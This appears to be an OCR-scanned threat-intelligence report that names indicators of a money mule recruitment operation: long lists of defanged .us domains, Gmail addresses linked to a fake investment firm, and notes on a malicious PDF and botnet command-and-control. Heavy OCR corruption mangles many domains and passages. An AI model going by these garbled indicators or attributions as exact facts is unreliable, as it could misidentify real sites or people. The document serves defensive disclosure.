hxxp://premins[.]us 
hxxp://nobsnutrition[.]us 
hxxp://dobestsite[.Jus 
hxxp://fancyartshop[.]us 
hxxp://freshnbrite[.Jus 
hxxp://realtyb[.]us 
hxxp://picshouse[.]us 
hxxp://usita[.]us 
hxxp://braingle[.Jus 
hxxp://indexpark[.]us 

26998 


hxxp://umassp[.]us 
hxxp://financecourses[.]us 
hxxp://bcimages[.]us 
hxxp://friendsforjustice[.]us 
hxxp://allenphoto[.]Jus 
hxxp://donnellyphotography[.]us 
hxxp://insors[.]us 
hxxp://moviefreak[.]us 
hxxp://taxforeclosure[.]us 
hxxp://titaninsurance[.]us 
hxxp://womenifaltutaionsj[.]us 
hxxp://greenfeathersroof[.]us 
hxxp://endingsinc[.]us 
hxxp://directedlubricationbearings[.]us 
hxxp://glamorlighting[.]us 
hxxp://gunviolencestats[.]us 
hxxp://exceptionalextractions[.]us 
hxxp://elitemedicalstaffingsolutions[.]us 
hxxp://stepmoon|[.]us 
hxxp://skypers[.]us 
hxxp://skyesthelimit[.Jus 
hxxp://prohibitionlabs[.]Jus 
hxxp://nextplastics[.]us 
hxxp://tennesseetours[.]us 
hxxp://madisonint[.]us 
hxxp://nadsofttestingdomain[.]us 
hxxp://naturallyaustin[.]Jus 
hxxp://treeherd[.]us 
hxxp://youserv[.]us 
hxxp://ghostshow[.]us 
hxxp://abundantwaterwells[.]us 
hxxp://inethosting[.]us 
hxxp://freshdesain[.]us 
hxxp://softlovestore[.]us 
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Individual People Capital Group describes itself as: 
"The Individual People Capital Group Companies is one of the world’s most experienced 


and successful investment management organizations. Our companies manage investments 
for millions of individuals and thousands of corporations and institutions. 


The Individual People Capital Group’s largest components are: 

¢ Individual People Funds, which ranks among the three largest mutual fund families in 
the U.S. - managed by Individual People Capital Research and Management Company, with 
assets under management of more than $750 billion 

¢ Individual People Capital Guardian Trust Company and the Individual People Capital 
International companies — providers of global investment management services for institu- 


tional clients, consultants and individuals, with assets under management of approximately 
$300 billion 


For 75 years, we have followed a consistent philosophy and approach to generate con- 
sistent long-term investment results for our investors around the world. At the heart of our 
success is a commitment to a number of core beliefs: the importance of long-term investing, 
the value of in-depth global research, adherence to a disciplined investment management 
philosophy, and a code of ethics that emphasizes honesty and integrity." 


Known Gmail accounts participating in the money mule recruitment and exploit serving 
process courtesy of Individual People Capital Group: 


[27]groupindividualpeople @ gmail.com 
[28]newindividualpeople24 @ gmail.com 
[29]newworkgroupindividualpeople @ gmail.com 
[30]individualpeoplecapitalgroup9 @ googlemail.com 
[31]lindividualpeoplecapitalgroup8 @ googlemail.com 
[32 ]individualpeoplecapitalgroup7 @ googlemail.com 
individualpeoplecapitalgroup6 @ googlemail.com 


[33]individualpeoplecapitalgr @ googlemail.com 
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ENGUSH ITALLANO 


“Perfect Finance Conditions 


i 
I PC are Provided” 


no conporate risk 


We're beng! 
yA 


home | about us | services | careers | contacts | login 


Individual People Capital Growp © 2008 | Privacy polbey 


[34]As well as the following emails, once again maintained by the same customer: 
individualpeoplecapitalgroup12 @ gmail.com 
individualpeoplecapitalgroup13 @ gmail.com 
individualpeoplecapitalgroup14 @ gmail.com 
individualpeoplecapitalgroup12 @ gmail.com 
individualpeoplecapitalgroup13 @ gmail.com 
individualpeoplecapitalgroup14 @ gmail.com 
individualpeoplecapitalgroup19 @ gmail.com 


individualpeople.one @ gmail.com 
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hxxp://somelight[.]us 
hxxp://themarredlif[.]us 
hxxp://theleftbehinds[.]Jus 
hxxp://votefortony[.]us 
hxxp://themarketinggrou[.]us 
hxxp://yatesstructuralengineeringpal[.]us 
hxxp://tasteoftheworld[.]us 


hxxp://transportationcrossroad[.]us 


27015 


hxxp://womensjaredallenjersey[.]us 
hxxp://sharynidesigner[.]us 
hxxp://vikander[.]us 
hxxp://valetconnection[.]us 
hxxp://supportpt[.]us 
hxxp://uggstores[.]us 
hxxp://youshoptoday[.]us 
hxxp://sincerit[.Jus 
hxxp://wallser[.]us 
hxxp://trasagroup[.]us 
hxxp://usalakes[.]us 
hxxp://thaiyogastretch[.]us 
hxxp://tourlive[.Jus 
hxxp://theartmachin[.]us 
hxxp://shopdanielespinosal[.]us 
hxxp://thedobie[.]us 
hxxp://thebreadbible[.]us 
hxxp://ushealthcar[.]us 
hxxp://sterlingandblack[.]us 
hxxp://telecompartner[.]us 
hxxp://waterwalls[.]us 
hxxp://travelinnhazen[.]Jus 
hxxp://thebearsgear[.]us 
hxxp://travelfiesta[.]us 
hxxp://terasak[.]us 
hxxp://theenglishacademy[.]us 
hxxp://wardles[.]us 
hxxp://treese[.]us 
hxxp://washingtoons[.]us 
hxxp://stellarluxury[.]Jus 
hxxp://thedelicio[.Jus 
hxxp://watershedresult[.]us 
hxxp://stermaull[.]us 
hxxp://cleannaturally[.Jus 
hxxp://bwcreativerailings[.]us 
27016 


hxxp://drainrightservices[.]us 
hxxp://downloaddriver[.]us 
hxxp://friendsfun[.]Jus 
hxxp://gamedaysportspublishin[.]us 
hxxp://dopedogapparel[.]us 
hxxp://italianlanguage[.]Jus 
hxxp://matthewlindsey[.]us 
hxxp://mfunding[.]us 
hxxp://iloveyoumorse[.]us 
hxxp://medapharmaceuticals[.]us 
hxxp://ketogenictests[.]us 
hxxp://rsho[.]us 
hxxp://peacepoetreepart[.]us 
hxxp://pokernetworking[.]us 
hxxp://oloveu[.]us 
hxxp://schoolsavings[.]us 
hxxp://popcultureprayercandle[.]us 
hxxp://nightwriter[.]us 
hxxp://natureaustralia[.]us 
hxxp://newsalembaptistchurch[.]us 
hxxp://themcsweeneys[.]us 
hxxp://thebigtop[.]Jus 
hxxp://westlondondrivingschool[.]us 
hxxp://venturedad[.]us 
hxxp://weatherlysuitesoceanshores[.]us 
hxxp://thomascyclery[.]us 
hxxp://threadstories[.]us 
hxxp://onebigroom[.]us 
hxxp://operationbucketlist[.]us 
hxxp://removedarkspotin[.]us 
hxxp://coolhomedecor[.]us 
hxxp://freepsdflyers[.]Jus 
hxxp://cleancultivators[.]us 
hxxp://childishcoupons[.]Jus 
hxxp://bbdentall[.Jus 


27017 


hxxp://indigomountain[.]us 
hxxp://gossoons[.]us 
hxxp://ballpox[.Jus 
hxxp://comdreamlandapplI. Jus 
hxxp://mallscanne[.]us 
hxxp://officialpittsburghsteelers[.Jus 
hxxp://ralphlaurenoutletonlines[.]us 
hxxp://oxkfinance[.]us 
hxxp://superbowlrings[.]us 
hxxp://mjsolutionsllc[.Jus 
hxxp://superstor[.]us 
hxxp://sharethenumber[.]us 
hxxp://checkerpr[.]us 
hxxp://assenti[.]us 
hxxp://bringinghomethebee[. ]us 
hxxp://alliantfood[.]us 
hxxp://colonialacresresortwyarmouth[.]us 
hxxp://cannabisterpenoid[.]us 
hxxp://athotels[.]us 
hxxp://lighthousepointe[.]us 
hxxp://dinosaurtrai[.Jus 
hxxp://cornerstoneweb[.]us 
hxxp://howtomarryamillionair[.]us 
hxxp://familycourtjudgeconraddsinger[.]us 
hxxp://enthusium[.]us 
hxxp://healingarttherapybyangell.]us 
hxxp://cmjmortgage[.]us 
hxxp://carinsuranceroute[.]us 
hxxp://getwithember[.]us 
hxxp://atozshoppingbargain[.]us 
hxxp://angelofhealth[.]us 
hxxp://couponzone[.]us 
hxxp://bridgecenter[.]us 
hxxp://healthinsured[.]us 
hxxp://aromafrangananance[.]us 
27018 


hxxp://inflationfighter[.]us 
hxxp://drtickle[.]us 


hxxp://freeresumewizard[.]us 


hxxp://aestheticrealismconsultation[.]us 


hxxp://denaturing[.]Jus 
hxxp://hockeyjersey[.]us 
hxxp://buyhcgonlin[.]us 
hxxp://getcleancarpetandtile[.]Jus 
hxxp://fanfusion[.]us 
hxxp://argons[.]us 
hxxp://iinteriors[.]Jus 
hxxp://culinerdyconcepts[.]us 
hxxp://buypropeciaonline[.]us 
hxxp://classicmotor[.]us 
hxxp://hvdrfinance[.]us 
hxxp://crescotheatre[.]us 
hxxp://cremamore[.]us 
hxxp://aegisengineerin[.]us 
hxxp://chinato[.]us 
hxxp://hippiestyle[.]us 
hxxp://freelancerhealthcollectivel[.]us 
hxxp://iinsight[.]us 
hxxp://cancerfactshq[.]us 
hxxp://createasuperpac[.]us 
hxxp://aimerconseil.]us 
hxxp://helpmyconstipatio[.]us 
hxxp://cardpic[.]us 
hxxp://resteractio[.]us 
hxxp://seanandkelsey[.]us 
hxxp://ridians[.]us 
hxxp://rydindecal[.]Jus 
hxxp://interstellarventure[.]us 
hxxp://iraginews[.]us 
hxxp://ishanibotanicals[.]us 


hxxp://intagen[.Jus 


27019 


hxxp://internetworker[.]us 
hxxp://itskindofalongstor[.]us 
hxxp://richeseliquid[.Jus 
hxxp://innthe[.Jus 
hxxp://saharash[.]us 
hxxp://iphonereplacementpart[.]us 
hxxp://millsinsuranceagenc[.]us 
hxxp://justinswanso[. ]us 
hxxp://papercoatingspecialist[.Jus 
hxxp://justletandappl[.Jus 
hxxp://jcmortgage[.]us 
hxxp://outofbound[.]us 
hxxp://messagetherapist[.]us 
hxxp://otherssal[.]us 
hxxp://pettyserve[.]us 
hxxp://mindofchrist[.]us 
hxxp://ourgivingtree[.]us 
hxxp://landthatilov[.]us 
hxxp://pearsonteachertest[.]us 
hxxp://mikewill[.]us 
hxxp://myresilienthealth[.]Jus 
hxxp://makemoneyonlinestore[.]us 
hxxp://recoverycbd[.]us 
hxxp://presidentbenjaminharrisongaller[.]us 
hxxp://rebeccaandanthony[.]us 
hxxp://reedsconsulting[.]us 
hxxp://maccelerator[.]us 
hxxp://mnstestsite[.]us 
hxxp://nexteraretailenerg[.Jus 
hxxp://movmentschool[.]us 
hxxp://joshyates[.Jus 
hxxp://powerbenefits[.]us 
hxxp://kingcountyzoom[. ]us 
hxxp://jordansofficialstore[.]us 
hxxp://nextgenerationfirewall.]Jus 
27020 


hxxp://mimiplannedevent[.]us 
hxxp://realestatement[.]us 
hxxp://onlinemarketingplan[.]Jus 
hxxp://Karenpinoci[.]us 
hxxp://realestateagentsmyrna[.]us 
hxxp://mastergat[.]us 
hxxp://makeyourdreamsarealit[.]us 
hxxp://onehotcookie[.]us 
hxxp://mamasport[.]us 
hxxp://propertyprotectionservic[.]us 
hxxp://multimediaexperience[.]us 
hxxp://miamiwealth[.]us 
hxxp://mtcrawford[.]us 
hxxp://midwestroofin[.]us 
hxxp://paintwars[.]us 
hxxp://planparkco[.]us 
hxxp://joestavern[.]us 
hxxp://lessthanabuc[.]us 
hxxp://montercasil[.Jus 
hxxp://radiantlove[.]Jus 
hxxp://multimotor[.Jus 
hxxp://noresolutioners[.]us 
hxxp://olliers[.]us 
hxxp://kingmakemoney|.]us 
hxxp://noreasonwhy[.]us 
hxxp://patriotsheart[.]us 
hxxp://nwmessenger[.]us 
hxxp://murrietakitchenandbathroom[.]us 
hxxp://lawrencevillev[.Jus 
hxxp://leadreward[.]Jus 
hxxp://officialcanadiensshop[.]us 
hxxp://mimiplannedeventsandpartyrental[.]us 
hxxp://odise[.]us 
hxxp://myretirementplanne[.]us 


hxxp://parishpublishing[.]us 


27021 


hxxp://puppypetstor[.]us 
hxxp://photographyressources[.]us 
hxxp://montessoripreschoolameric[.]us 
hxxp://victoriaprincipall[.Jus 
hxxp://speednetworkingkuwai[.]us 
hxxp://thesushiconnectio[.]us 
hxxp://unitedche[.]us 
hxxp://superiorautorepair[.]us 
hxxp://theybfar[.]Jus 
hxxp://skinwhiteningtreatment[.]us 
hxxp://vfactor[.]us 
hxxp://yosemiteresor[.]us 
hxxp://williamcurryconstruction[.]us 
hxxp://smengineering[.]us 
hxxp://bodyfairy[.]us 
hxxp://karail[.Jus 
hxxp://trinitybaptist[.]us 
hxxp://blushbee[.]us 
hxxp://climatekids[.]us 
hxxp://marren[.]us 
hxxp://palmersheim[.]us 
hxxp://popshirt[.]us 
hxxp://premierplastics[.]us 
hxxp://halorealty[.]us 
hxxp://brentatwood[. ]us 
hxxp://cellplay[.]us 
hxxp://backporchchurch[.]us 
hxxp://artistsconsult[.]us 
hxxp://earlyyearsschool[.]us 
hxxp://crusinghealth[.]us 
hxxp://collincountyhomes[.]us 
hxxp://faithandconnorminted[.]Jus 
hxxp://gettealwatt[.]Jus 
hxxp://ichomes[.]us 
hxxp://fastca[.]us 

27022 


people.individ @ gmail.com 
individ.people @ gmail.com 
individualpeople.too @ gmail.com 
new.individualpeople @ gmail.com 
individual.job.it @ gmail.com 
info.individualpeople @ gmail.com 
j.wilson.sup @ gmail.com 
new.individualpeople @ gmail.com 
people.individ @ gmail.com 
robert.jwn @ gogglemail.com 
robert.wilson.rl @ gmail.com 
robert.wil.r @ gmail.com 
rob.wilson.r @ googlemail.com 
wilson.wrt @ gmail.com 


workgroupindividualpeople @ gmail.com 


There are cases when money mule recruiters are interested in plain simple botnet build- 
ing, case in point is a situation where a spammed money mule spam message advertising 
[35]individualpeople .biz/go.php?sid=7 was actually [36]serving a malicious PDF, next to 
linking to the recruitment site itself (individualpeople .org). 


In order to further demonstrate the ongoing standardizing of the money mule recruit- 
ment process through template-ization, it’s time to expose the bogus brands portfolio, and 
associated domains of a money mule recruitment organization that has been relying on an 
identical template over the past couple of years. In fact, in May, 2009, a [37]botnet which 
was used by Ukrainian dating scam agency Confidential Connections was not only found to 
be directly related to the money mule recruitment gang, but the cybercriminals used one of 
the [38]recruitment domains as a command and control server for their botnet spamming 
operations, with the domain itself and one of the sampled dating scam ones registered under 
the same email. 


2705 


hxxp://fwcadulteducation[.]us 
hxxp://globalheartbreak[.]us 
hxxp://lighthousesusa[.]us 
hxxp://lockporttrailers[.]us 
hxxp://outdoorescapesofval[.]us 
hxxp://nunnontherun[.]us 
hxxp://phillyia[.Jus 
hxxp://mycityadventures[. ]us 
hxxp://publicenemies[.]us 
hxxp://miamiattractions[.]us 
hxxp://sinnercity[.]us 
hxxp://thehustlerscapita[.]Jus 
hxxp://truckerwifeblessedscentsy[.]us 
hxxp://washoecountylibary[.]us 
hxxp://williamrickard[.]us 
hxxp://bridgemenl|. Jus 
hxxp://howisthewater[.]us 
hxxp://gonsonly[.]Jus 
hxxp://sellingbooksstore[.]us 
hxxp://perretta[.Jus 
hxxp://sneakerfans[.]us 
hxxp://sshare[.]us 
hxxp://shoesjordan[.]Jus 
hxxp://windryder[.]us 
hxxp://fastfoodpackaging[.]us 
hxxp://californiapublicrecords[.]us 
hxxp://travelingtandem[.]us 
hxxp://untilthewholeworldhears[.]us 
hxxp://goodfridayimages[.]us 
hxxp://idempotent[.Jus 
hxxp://waytostay[.]us 
hxxp://alscosoftware[.]us 
hxxp://newsalarm|[.]us 
hxxp://singlefn[.]us 


hxxp://phoenixentertainment[.]us 


27023 


hxxp://beasolution[.]us 
hxxp://softcellcorp[.Jus 
hxxp://birgitoestergaard[.]us 
hxxp://wellfunded[.]us 
hxxp://rmsconstructors[.]us 
hxxp://browsecontacts[.]us 
hxxp://thegreatfox[.]us 
hxxp://affordablemobilelocksmith[.]us 
hxxp://ijstartccanon[.]Jus 
hxxp://courtneymichaels[.]us 
hxxp://mountainmedicine[.]us 
hxxp://homedepotsurvey[.]us 
hxxp://jetboaters[.]us 
hxxp://genuinehome[.]us 
hxxp://itstahoe[.]us 
hxxp://iarkmedial[.]us 
hxxp://leatherpro[.]us 
hxxp://luxcheats[.]us 
hxxp://tribalera[.Jus 
hxxp://weddingcollections[.]us 
hxxp://dressystyles[.]us 
hxxp://savepagel[.]us 
hxxp://welcomehomefl[.]us 
hxxp://nteinsoft[.]us 
hxxp://healthenly[.Jus 
hxxp://ritengal[.]us 
hxxp://pharmacymall[.Jus 
hxxp://trollydolly[.]us 
hxxp://citywideservices[.]us 
hxxp://sternchen[.]us 
hxxp://brentdye[.]us 
hxxp://telfarinsale[.]us 
hxxp://thefarmersdog[.]us 
hxxp://homeimg[.]us 
hxxp://cwstriad[.]us 

27024 


hxxp://usareviews[.]us 


hxxp://zonelid[.Jus 


hxxp://primegrrensolutioasnsj[.]us 


hxxp://swimwearcollections[.]us 


hxxp://thereaper[.]us 


hxxp://protocoldibtsgsheragett[.]us 


hxxp://repsites[.]us 
hxxp://prescriptionretinal[.]us 
hxxp://canpack[.]us 
hxxp://cheersandbeers[.]us 
hxxp://berserkerevents[.]us 
hxxp://harrysheroes[.]us 
hxxp://lottobingo[.]us 
hxxp://nemeo[.]us 
hxxp://hetrototo[.]us 
hxxp://hondacars[.]us 
hxxp://ledallthethethings[.]us 
hxxp://insiderreward[.]us 
hxxp://drivingusa[.]us 
hxxp://aponteporsiempre[.]us 
hxxp://hhphotography[.]us 
hxxp://wingl[.]us 
hxxp://wowvender[.]us 
hxxp://mathsspot[.]Jus 
hxxp://monclerjacketshop[.]us 
hxxp://reparihomeshed[.]us 
hxxp://contemporaryclassic[.]us 
hxxp://theportlandct[.]us 
hxxp://toothimplant[.]Jus 
hxxp://traviscooper[.]us 
hxxp://mobilepcdoctor[.]us 
hxxp://infogiftcard[.]us 
hxxp://learncodefrom[.]us 
hxxp://bestcloudmsedias[.]us 


hxxp://kaplandefense[.]us 


27025 


hxxp://myelitefitness[.]us 
hxxp://cabinetgranit[.]us 
hxxp://americanmotorsports[.]us 
hxxp://aridavid[.Jus 
hxxp://avconline[.]us 
hxxp://ambassadorministries[.]us 
hxxp://americanbrigade[.]us 
hxxp://arabicyellowpages[.]us 
hxxp://americanbrokerage[.]us 
hxxp://allstarconstruction[.]us 
hxxp://alleghencourts[.]us 
hxxp://ascentfinanciall[.]us 
hxxp://abclearing[.]Jus 
hxxp://aiwins[.]us 
hxxp://agredano[.]us 
hxxp://jordanretroofficiall[.]us 
hxxp://machupichul[.]us 
hxxp://icongen[.]us 
hxxp://michaelregan[.]us 
hxxp://urbanbed[.]us 
hxxp://rightingamerical[.]us 
hxxp://iptooll[.Jus 
hxxp://superbowljersey[.]us 
hxxp://heartstopper[.]us 
hxxp://labestia[.]us 
hxxp://ksem[.]us 
hxxp://moora[.]us 
hxxp://winateverything[.]us 
hxxp://ubdesign[.]us 
hxxp://yourewrite[.]us 
hxxp://islandhaven[.]us 
hxxp://californiagoldalmonds[.]Jus 
hxxp://theskulls[.]us 
hxxp://podtraining[.]us 
hxxp://lattner[.]us 

27026 


hxxp://dynadoor[.]us 
hxxp://dientes[.]us 
hxxp://dotgloball[.]us 
hxxp://openaid[.]Jus 
hxxp://pacoc[.]us 
hxxp://cnfs[.]us 
hxxp://tinawilliams[.Jus 
hxxp://chaosevents[. ]us 
hxxp://navethetalkamerica[.]us 
hxxp://greatstu[.]us 
hxxp://limelightpics[.]us 
hxxp://parentwarehouse[.]us 
hxxp://honkiesforherman[.]us 
hxxp://financialprotection[.]us 
hxxp://nienstedt[.]us 
hxxp://overseasy[.]us 
hxxp://redesigngreen[.]us 
hxxp://desertskys[.]us 
hxxp://schandenschmuck[.]us 
hxxp://yourfreewebhost[.]us 
hxxp://warrentyinfo[.]us 
hxxp://caminodevidal.]us 
hxxp://westhempsteadbroncos[.]us 
hxxp://premiumawnings[.]us 
hxxp://tormentedont[.]us 
hxxp://vtrainingroom[.]Jus 
hxxp://stickinvest[.]us 
hxxp://williamsonelectrical[.Jus 
hxxp://seattleseahawksstore[. ]us 
hxxp://clearwaterassociates[.]us 
hxxp://arlinhtonhousing[.]us 
hxxp://alliswellbutto[.]us 
hxxp://holytrinitych[.]us 
hxxp://thebrandbibles[.]us 
hxxp://pahealth[.]Jus 


27027 


hxxp://estilos[.]us 
hxxp://exoticjet[.Jus 
hxxp://groudfloor[.]us 
hxxp://heraldm[.]us 
hxxp://arlingnval[.Jus 
hxxp://costituzione[.]us 
hxxp://madebyartists[.]us 
hxxp://mercycancer[.]us 
hxxp://forminsting[.]us 
hxxp://wareflee[.]Jus 
hxxp://justindriscoll[.]us 
hxxp://massfireradio[.]us 
hxxp://ardesigners[.]us 
hxxp://carlking[.]us 
hxxp://lyfewellness[.]us 
hxxp://statusit[.]us 
hxxp://freewebclinic[.]us 
hxxp://crossoverelite[.]us 
hxxp://pearsonauthorsolutions[.]us 
hxxp://clubliondon[.]us 
hxxp://eliteestate[.]us 
hxxp://appuntil[.]us 
hxxp://theknowledgebank[.]Jus 
hxxp://wingpinclothing[.]Jus 
hxxp://snapitup[.]us 
hxxp://tainhac[.]us 
hxxp://yourmovies[.]us 
hxxp://serviciodegrua[.]us 
hxxp://dimorarealestate[.]us 
hxxp://lisinoprilgeneric[.Jus 
hxxp://deadeye[.]us 
hxxp://australiaboots[.]Jus 
hxxp://bovaping[.]us 
hxxp://promebell.]us 
hxxp://gategourmet[.]us 
27028 


hxxp://noonelikesus[.]us 
hxxp://fdfl[.Jus 
hxxp://bstory[.Jus 
hxxp://banksupport[.]us 
hxxp://greenfieldcapitall[.]us 
hxxp://sendcare[.]us 
hxxp://snapshotsof[.]us 
hxxp://blogposting[.Jus 
hxxp://Iceservices[.]us 
hxxp://fitlike[.]us 
hxxp://distributiecentrum[.]us 
hxxp://exclusivecuts[.]us 
hxxp://newyorksports[.]us 
hxxp://hickmans[.]us 
hxxp://beautypros[.]us 
hxxp://blsw[.]Jus 
hxxp://trubestars[.]us 
hxxp://whatsthebigdeall[.]Jus 
hxxp://twistify[.]us 
hxxp://stunningweddings[.]us 
hxxp://yvonnestrahovskil.]us 
hxxp://dirtyworks[.]us 
hxxp://lemonmeringue[.]us 
hxxp://untetheredhearts[.]us 
hxxp://buyskincellpro[.Jus 
hxxp://qualiahealing[.]us 
hxxp://beattgestreet[.]us 
hxxp://realxmarketing[.]us 
hxxp://rbcant[.]us 
hxxp://domineer[.]us 
hxxp://alexrangell[.Jus 
hxxp://ravennarecreation[.]us 
hxxp://politie[.]us 
hxxp://itfort[.]us 


hxxp://poundsofscents[.]us 


27029 


hxxp://carpetcleaningexperts[.]Jus 
hxxp://eventstreams[.]us 
hxxp://landprolic[.]us 
hxxp://eliteconcierge[.]us 
hxxp://comchain[.]us 
hxxp://cashstripe[.]Jus 
hxxp://pearsondatasolutions[.]us 
hxxp://dibdesigns[.]us 
hxxp://alleghenycountytreasrer[.]us 
hxxp://clarkecountycourts[.]us 
hxxp://wordpresshost[. ]us 
hxxp://trannydance[.]us 
hxxp://ycspowerschool[.]us 
hxxp://utes[.]us 
hxxp://sportile[.]us 
hxxp://youradvocate[.]us 
hxxp://startip[.]us 
hxxp://shesellsseashells[.]us 
hxxp://stevesplumbing[.]us 
hxxp://softlandingusal.]us 
hxxp://thefreedomrevolution[.]us 
hxxp://visitvegasandwin[.]us 
hxxp://washingtongas[.]us 
hxxp://mattlester[.]us 
hxxp://alldayfash[.]us 
hxxp://elshaddaimnistries[.]us 
hxxp://besthearingaids[.]us 
hxxp://businessamericaservices[.]us 
hxxp://deltagraphics[.]us 
hxxp://deltatrust[.]us 
hxxp://eagleswingscharter[.]us 
hxxp://cellsolutions[.]us 
hxxp://engineeringparks[.]us 
hxxp://anypronouns[.]us 
hxxp://carolinearrives[.]us 

27030 


hxxp://drinkcollagen[.]us 
hxxp://buydmtonline[.]us 
hxxp://erikrichter[.]us 
hxxp://freetogo[.]us 
hxxp://foodbangers[.]us 
hxxp://feethero[.]us 
hxxp://groundpowerenergys[.]us 
hxxp://hunkered[.]Jus 
hxxp://growleybearcreations[.]us 
hxxp://guitarcompass[.]us 
hxxp://homesight[.]us 
hxxp://fishingreview[.]us 
hxxp://nowardstern[.]us 
hxxp://lifestyleshop[.]Jus 
hxxp://marlenne[.]us 
hxxp://outdoorlivingcharlotte[.Jus 
hxxp://metroalliance[.]us 
hxxp://neweraretail[.]us 
hxxp://ponomarev[.]us 
hxxp://pandorajewelry[.]us 
hxxp://perpelflame[.]us 
hxxp://proinc[.Jus 
hxxp://justicialatina[.Jus 
hxxp://jmphoto[.]Jus 
hxxp://phyilla[.]us 
hxxp://projectaccess[.]us 
hxxp://ivermectins[.]Jus 
hxxp://photoeditorr[.]us 
hxxp://cyberaegis[.]us 
hxxp://oxfordhousevacancies[.]us 
hxxp://clarkemfg[.]us 
hxxp://sixshooter[.]us 
hxxp://wndesign[.]us 
hxxp://zeefinity[.]us 
hxxp://hospitalityfurniture[.]us 


27031 


hxxp://virge[.Jus 
hxxp://superstop[.]us 
hxxp://ralko[.]us 
hxxp://byso[.]us 
hxxp://prestigeauctions[.]us 
hxxp://turbomail[.]us 
hxxp://qualityforlife[.]us 
hxxp://nickandemmaf[.]us 
hxxp://nanovault[.]us 
hxxp://happyhoops[.]us 
hxxp://vedkal[.]Jus 
hxxp://dynamicbalance[.]us 
hxxp://kxmedia[.]us 
hxxp://inzeraty[.]us 
hxxp://olderwoman[.]us 
hxxp://animalitos[.Jus 
hxxp://snapclub[.]us 
hxxp://glowmore[.]us 
hxxp://genesisacademy|[.]us 
hxxp://avalex[.]us 
hxxp://crplumbing[.]us 
hxxp://shoppingplatinum[.]us 
hxxp://futurecoders[.]us 
hxxp://infotecnica[.]us 
hxxp://reviewly[.Jus 
hxxp://xtest[.Jus 
hxxp://colosu[.]us 
hxxp://emergingmanagers[.]us 
hxxp://theconclusionlor[.]us 
hxxp://jtapperal[.Jus 
hxxp://keepertool[.]us 
hxxp://babycharms[.]us 
hxxp://formstats[.]us 
hxxp://chestnutwedding[.]us 
hxxp://dogslicenses[.]us 
27032 


Brokerage services mciude support n 
Duyrg'teling 2! shares o> Demet cf the 
o— mores 


Treaperescy of Gepestory servces 
mates Pam ae eteter te he nteresied 


Feel he comvenence of Assets Trust 
Usragerent and he Venn we yet 


Corporate Frasce 


Brand names for Money Mule Organizations using a standardized template offered by a 
single vendor, all known to have been "set up in 1990 in New York, the USA by three 
enthusiasts who have financial education" : Affina Group Inc; Alliance Group Inc; Annuity 
Group Inc; Archway Group Inc; Armor Group Inc; Assurity Group Co; Assurity Group Inc; BFS 
Group Inc; CDI Group Inc; Cosco Group Inc; Dove Group Inc; Eagle Group Inc; Entrust Group 
Inc; Extreme Group Inc; Flat Group Inc; Holding Group Inc; Integrity Group Inc; Invalda Group 
Inc; Key Group Inc; Liberty Group Inc; Lime Group Inc; Massive Group Inc; Melson Group Inc; 
MENA Group Inc; O Pm Group Main; OPM Group Inc; Premier Group Inc; Prime Group Inc; 
Prospera Group Inc; Puritan Group Inc; Reach Group Inc; Redeye Group Inc; Regency Group 
Inc; Rengo Group Inc; River Group Inc; Saturn Group; Scope Group Inc; Stock Group Inc; Strol 
Group Inc; Summit Group Inc; Total Group Inc; Trans Group Inc; United Group Inc; Wescom 
Group Inc 


2706 


hxxp://matthewbaur[.]us 
hxxp://identomat[.]Jus 
hxxp://videofutura[.]us 
hxxp://leasingamerical[.]us 
hxxp://ourladyoftheanges[.]us 
hxxp://opcioncreatival[.]us 
hxxp://coloradosupremecout[.]us 
hxxp://clothingmen[.]us 
hxxp://riveracenter[.]us 
hxxp://howardlal.]us 
hxxp://enternalevent[.]us 
hxxp://westpiel[.]us 
hxxp://blidevicekerme|[.]us 
hxxp://carrole[.Jus 
hxxp://drlemons[.]us 
hxxp://elitenurses[.]us 
hxxp://domorefor[.]us 
hxxp://gtcalifornia[.]Jus 
hxxp://globaltecusainc[.]us 
hxxp://getrading[.]us 
hxxp://denverpetcemetery[.]Jus 
hxxp://hanadispatchsolutions[.]us 
hxxp://fgbands[.]Jus 
hxxp://femalebodybuilding[.]Jus 
hxxp://naturescapes[.]us 
hxxp://bookthebest[.]us 
hxxp://goddessstyle[.]us 
hxxp://btcphotography[.]us 
hxxp://naturalight[.]us 
hxxp://dollipolewear[.]us 
hxxp://lifeslemonade|[.]us 
hxxp://aestheticsworld[.]us 
hxxp://leddirect[.Jus 
hxxp://littlebees[.]Jus 


hxxp://nexgenabstract[.]us 


27033 


hxxp://integrityhousing[.]us 
hxxp://colinghug[.]us 
hxxp://baconfesttexas[.]us 
hxxp://fuelcore[.Jus 
hxxp://americanos[.]us 
hxxp://operationmountainstrong[.]us 
hxxp://putterking[.]us 
hxxp://revelationapparell.Jus 
hxxp://readysharp[.]us 
hxxp://propertymojo[.]us 
hxxp://pozdrive[.]us 
hxxp://nlinehome[.]us 
hxxp://shroomsforsale[.]us 
hxxp://someblackcat[.]Jus 
hxxp://speerfoundatio[.]us 
hxxp://sterlingcufflinks[.]Jus 
hxxp://wsabrasives[.]us 
hxxp://yourpath[.]us 
hxxp://yogawellbeing[.]Jus 
hxxp://juventusvsvillarreal[.]us 
hxxp://encala[.Jus 
hxxp://mediquipsolutions[.]us 
hxxp://livrelindo[.]us 
hxxp://buyimers[.]us 
hxxp://goldcufflinks[.]us 
hxxp://ccsolutionsllc[.]us 
hxxp://misschinese[.]us 
hxxp://globalvacations[.]us 
hxxp://babehomestead[.]us 
hxxp://holiaa[.]us 
hxxp://devicecornerfusion[.]us 
hxxp://bridgepointstudios[.]us 
hxxp://codycrossanswers[.]us 
hxxp://grofental[.]Jus 
hxxp://jerseysupply[.]us 
27034 


hxxp://alleghenytreasure[.]us 
hxxp://deptofmilitaryveterans[.]us 
hxxp://mainsailit[.]us 
hxxp://ascendpartners[.]us 
hxxp://essentialtech[.]Jus 
hxxp://nflnikejerseys[.]us 
hxxp://proinvestments[.]us 
hxxp://ptrend[.]us 
hxxp://sarasingh[.]us 
hxxp://newinfo[.]us 
hxxp://riseamerica[.]us 
hxxp://pawliticallycorrect[.]Jus 
hxxp://scarace[.]us 
hxxp://ninjasec[.Jus 
hxxp://statesymbols[.]us 
hxxp://ulmastruction[.]us 
hxxp://todaybusinessnewsl[. ]us 
hxxp://siamind[.]Jus 
hxxp://theloungenailspa[.]Jus 
hxxp://solanashande[.]us 
hxxp://tpelogistics[.]us 
hxxp://walletinvestor[.]us 
hxxp://ukimmigrationattorneymassachusetts[. ]us 
hxxp://ssmedial[.]us 
hxxp://shelterhere[.]us 
hxxp://thetreasurebox[.]us 
hxxp://wearerelish[.]us 
hxxp://thewrightway[.]us 
hxxp://skillate[.]us 
